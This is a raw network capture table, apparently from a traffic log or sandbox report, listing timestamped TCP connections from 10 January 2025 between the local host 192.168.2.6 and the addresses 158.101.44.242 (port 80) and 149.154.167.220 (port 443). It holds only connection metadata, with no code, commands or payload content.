                                                                                                                Jan 10, 2025 22:43:56.922914028 CET44350009149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.923018932 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.923460960 CET50009443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:56.926250935 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.926961899 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.931360006 CET8050008158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.931514978 CET5000880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.931821108 CET8050010158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:56.931885004 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.931965113 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:56.936769009 CET8050010158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:57.524126053 CET8050010158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:57.527781963 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:57.527849913 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:57.527929068 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:57.528193951 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:57.528206110 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:57.574439049 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.158023119 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.159816980 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:58.159842014 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.159903049 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:58.159913063 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.555560112 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.555656910 CET44350011149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.555715084 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:58.568836927 CET50011443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:58.643475056 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.648605108 CET8050010158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.648711920 CET5001080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.680286884 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.685216904 CET8050012158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:58.685305119 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.712678909 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:58.717550993 CET8050012158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.291250944 CET8050012158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.292962074 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:59.293066978 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.293203115 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:59.293780088 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:59.293809891 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.340085030 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:43:59.929893017 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.931910992 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:59.931934118 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:43:59.932043076 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:43:59.932056904 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.306163073 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.306276083 CET44350013149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.306426048 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:00.306838036 CET50013443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:00.309664011 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:00.310667992 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:00.314708948 CET8050012158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.315440893 CET8050014158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.315624952 CET5001280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:00.315656900 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:00.315828085 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:00.320569992 CET8050014158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.928858995 CET8050014158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.930005074 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:00.930047035 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.930123091 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:00.930424929 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:00.930439949 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:00.980715990 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.621939898 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.623594046 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:01.623657942 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.623742104 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:01.623766899 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.881059885 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.881146908 CET44350015149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.881200075 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:01.881665945 CET50015443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:01.884824038 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.885862112 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.889775038 CET8050014158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.889825106 CET5001480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.890688896 CET8050016158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:01.890755892 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.890877008 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:01.895581961 CET8050016158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:02.501419067 CET8050016158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:02.507010937 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:02.507067919 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:02.507117033 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:02.507438898 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:02.507451057 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:02.543253899 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.132617950 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.134582043 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:03.134628057 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.134707928 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:03.134718895 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.565576077 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.565804005 CET44350017149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.565896988 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:03.566143036 CET50017443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:03.569152117 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.569868088 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.574112892 CET8050016158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.574215889 CET5001680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.574661970 CET8050018158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:03.574738026 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.574836969 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:03.579555035 CET8050018158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.147130966 CET8050018158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.148694038 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:04.148766994 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.148864031 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:04.149203062 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:04.149214029 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.199523926 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:04.756484032 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.758328915 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:04.758358955 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:04.758433104 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:04.758445024 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.137852907 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.137964010 CET44350019149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.138029099 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:05.138413906 CET50019443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:05.141063929 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:05.142389059 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:05.146102905 CET8050018158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.146179914 CET5001880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:05.147205114 CET8050020158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.147265911 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:05.147349119 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:05.152139902 CET8050020158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.755862951 CET8050020158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.757380962 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:05.757426977 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.757530928 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:05.757843018 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:05.757858038 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:05.808898926 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.364720106 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.366548061 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:06.366566896 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.366679907 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:06.366691113 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.769321918 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.769411087 CET44350021149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.769551039 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:06.770102978 CET50021443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:06.772842884 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.774007082 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.777848005 CET8050020158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.777918100 CET5002080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.778811932 CET8050023158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:06.778987885 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.778987885 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:06.783775091 CET8050023158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:07.352101088 CET8050023158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:07.353600025 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:07.353645086 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:07.353842020 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:07.354020119 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:07.354033947 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:07.402810097 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:08.056778908 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.065979004 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:08.066030979 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.066104889 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:08.066126108 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.473613024 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.473862886 CET44350025149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.473953009 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:08.474287987 CET50025443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:08.477703094 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:08.478642941 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:08.483537912 CET8050026158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.483619928 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:08.483690023 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:08.488486052 CET8050026158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.500950098 CET8050023158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:08.501004934 CET5002380192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:09.059585094 CET8050026158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:09.060976982 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:09.061037064 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:09.061125994 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:09.061424971 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:09.061441898 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:09.105740070 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:09.670892000 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:09.672502995 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:09.672547102 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:09.672630072 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:09.672656059 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.067661047 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.068074942 CET44350027149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.068181992 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:10.071537971 CET50027443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:10.075901031 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:10.076836109 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:10.080926895 CET8050026158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.081123114 CET5002680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:10.081687927 CET8050028158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.081767082 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:10.081916094 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:10.086673021 CET8050028158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.669655085 CET8050028158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.671200037 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:10.671236038 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.671339989 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:10.671621084 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:10.671631098 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:10.715127945 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.300570965 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.303095102 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:11.303112030 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.303203106 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:11.303208113 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.615736008 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.615819931 CET44350029149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.616031885 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:11.616439104 CET50029443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:11.619494915 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.620831966 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.624494076 CET8050028158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.624596119 CET5002880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.625655890 CET8050030158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:11.625744104 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.625937939 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:11.630706072 CET8050030158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.193787098 CET8050030158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.195044994 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:12.195082903 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.195148945 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:12.195415974 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:12.195424080 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.246351957 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:12.811629057 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.813417912 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:12.813433886 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:12.813509941 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:12.813517094 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.222625017 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.222712040 CET44350031149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.222930908 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:13.223213911 CET50031443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:13.226155043 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:13.227463007 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:13.231184959 CET8050030158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.231287003 CET5003080192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:13.232315063 CET8050032158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.232394934 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:13.232475042 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:13.237245083 CET8050032158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.892982006 CET8050032158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.894227028 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:13.894274950 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.894346952 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:13.894674063 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:13.894690037 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:13.933856010 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.524014950 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.525917053 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:14.525945902 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.526010036 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:14.526020050 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.906716108 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.906842947 CET44350033149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.906974077 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:14.907618999 CET50033443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:14.910820961 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.912098885 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.916717052 CET8050032158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.916812897 CET5003280192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.916862965 CET8050034158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:14.916929960 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.917020082 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:14.921720982 CET8050034158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:15.508838892 CET8050034158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:15.510284901 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:15.510335922 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:15.510440111 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:15.510746002 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:15.510761976 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:15.558885098 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.117965937 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.119880915 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:16.119905949 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.119986057 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:16.119993925 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.461330891 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.461436987 CET44350035149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.461527109 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:16.462260008 CET50035443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:16.465029955 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.466434956 CET5003680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.470017910 CET8050034158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.470082998 CET5003480192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.471240997 CET8050036158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:16.471350908 CET5003680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.471555948 CET5003680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:16.476372004 CET8050036158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.063958883 CET8050036158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.065531969 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:17.065640926 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.066159964 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:17.066159964 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:17.066200972 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.105746984 CET5003680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:17.682928085 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.685074091 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:17.685115099 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:17.685177088 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:17.685184956 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:18.073683023 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:18.073765993 CET44350037149.154.167.220192.168.2.6
                                                                                                                Jan 10, 2025 22:44:18.073894024 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:18.074529886 CET50037443192.168.2.6149.154.167.220
                                                                                                                Jan 10, 2025 22:44:18.077805042 CET5003680192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:18.079112053 CET5003880192.168.2.6158.101.44.242
                                                                                                                Jan 10, 2025 22:44:18.082861900 CET8050036158.101.44.242192.168.2.6
                                                                                                                Jan 10, 2025 22:44:18.082977057 CET5003680192.168.2.6158.101.44.242
